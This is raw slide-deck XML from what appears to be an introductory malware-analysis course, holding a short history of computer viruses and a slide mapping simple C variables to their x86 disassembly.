              <a:rPr b="0" i="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>if</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Loop </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>while</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Function calls</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Other: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>switch</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>array</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" i="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>structs</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pP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TextShape 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9143640" cy="1124280"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="fbd4b4"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit fontScale="69000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="4400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>History Computer Virus &amp; Malware</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1949, John von Neumann</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>“Theory and Organization of Complicated Automata” </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1971, Creeper</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>(Bob Thomas at BBN Technologies) is able to move between computers.  </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1974, Wabbit</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>A self-replicating program copied itself until it bogs down the system </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1982, Elk Cloner</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: Written by a 15-year-old, Elk Cloner is one of the earliest widespread, self-replicating viruses to affect personal computers. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1986, Fred Cohen</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Coined the term “</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>virus</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>” in his Ph.D thesis.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1986 –  Brain Boot Sector Virus</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Generally regarded as the first virus to infect MS-DOS computers.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1986 , PC-Write Trojan</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>the earliest Trojans as a popular shareware program called “PC-Writer.”. It would erase all of a user’s files.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1988, Morris Worm</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>infected a substantial percentage of computers connected to ARPANET, bringing the network down within 24 hours. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1991, Michelangelo Virus</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>was designed to erase information from hard drives on March 6th, the birthday of the famed Renaissance artist. Impacted about 10,000 systems, but the hype significantly raised public awareness of computer viruses.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>1999, Melissa Virus</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>the first mass-emailed virus, utilized Outlook address books from infected machines, and mailed itself to 50 people at a time.</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Recognizing C/C++ structure</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="516"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Global &amp; Local variable</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="517" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251640" y="1845000"/>
            <a:ext cx="3124800" cy="228564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GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>int x = 1;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>int y = 2;</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void main()</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a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>x = x+y;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>printf("Total = %d\n", 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a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="518" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="251640" y="4151520"/>
            <a:ext cx="3124800" cy="228564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void main()</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a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>int x = 1;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>int y = 2;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>x = x+y;</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>printf("Total = %d\n", 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a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="519" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3924000" y="1845000"/>
            <a:ext cx="4835160" cy="255996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00401003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eax, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>dword_40CF60;  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>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00401008 add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eax, dword_40C000; </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>y</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0040100E mov </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>dword_40CF60</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>, eax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00401013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ecx, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
